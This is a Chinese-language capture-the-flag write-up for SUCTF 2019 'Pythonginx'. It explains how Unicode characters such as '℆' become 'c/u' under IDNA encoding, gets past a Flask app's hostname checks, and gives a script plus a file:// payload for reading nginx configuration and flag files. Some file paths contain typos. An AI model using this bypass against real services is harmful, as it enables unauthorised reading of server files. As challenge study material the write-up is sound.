SUCTF 2019 Pythonginx

这关主要是url中的unicode漏洞引发的域名安全问题
1、域名欺骗 ：
访问此网站http://Вaidu.com(其中的В是unicode U+0412)
会跳转到http://xn--aidu-f4d.com/
也可以换成其他的unicode
访问http://Вaidu.com 时浏览器会将访问的url交给域名系统（DNS）解析url为ip地址
解析url过程用到递归查询和迭代查询 先递归搜索浏览器自己的dns缓存然后搜索操作系统的dns缓存 再搜索hosts文件缓存
搜索本地域名服务器 但后迭代搜索根域名服务器知道找到ip地址 找不到就是404
在DNS中idna使用punycode转写将ascii字符串存储，本地DNS中因为遇见特殊字符В 因此无法将其转成正常ascii
就直接在本地转化为http://xn--aidu-f4d.com/

还有要知道ngix重要文件的位置
nginx重要文件的位置：

配置文件存放目录：/etc/nginx
主配置文件：/etc/nginx/conf/nginx.conf
管理脚本：/usr/lib64/systemd/system/nginx.service
模块：/usr/lisb64/nginx/modules
应用程序：/usr/sbin/nginx
程序默认存放位置：/usr/share/nginx/html
日志默认存放位置：/var/log/nginx
配置文件目录为：/usr/local/nginx/conf/nginx.conf

源码这边
@app.route(‘/getUrl’, methods=[‘GET’, ‘POST’])
def getUrl():
url = request.args.get(“url”)
host = parse.urlparse(url).hostname
if host == ‘suctf.cc’:
return “我扌 your problem? 111”
parts = list(urlsplit(url))
host = parts[1]
if host == ‘suctf.cc’:
return “我扌 your problem? 222 “ + host
newhost = []
for h in host.split(‘.’):
newhost.append(h.encode(‘idna’).decode(‘utf-8’))
parts[1] = ‘.’.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(‘ ‘)[0]
host = parse.urlparse(finalUrl).hostname
if host == ‘suctf.cc’:
return urllib.request.urlopen(finalUrl).read()
else:
return “我扌 your problem? 333”

是要对host的判断然后绕过这两个判断 如果一开始就是suctf.cc压根就没办法

需要访问suctf.cc/user/local/nginx/conf/nginx.conf 访问这个配置文件应该能找到flag 位置
跑脚本

#coding:utf-8

for i in range(128,65537):
tmp=chr(i)
try:
res = tmp.encode(‘idna’).decode(‘utf-8’)
if(“-“) in res:
continue
print(“U:{} A:{} ascii:{} “.format(tmp, res, i))
except:
pass

找到℆这么一个字符恰好会因为这个漏洞被解析成c/u 这样就能绕过

构造file://suctf.c℆sr/local/nginx/conf/nginx.conf 也可以用ℂ 来替代c

最终payload：

file://suctf.c℆sr/fffffflag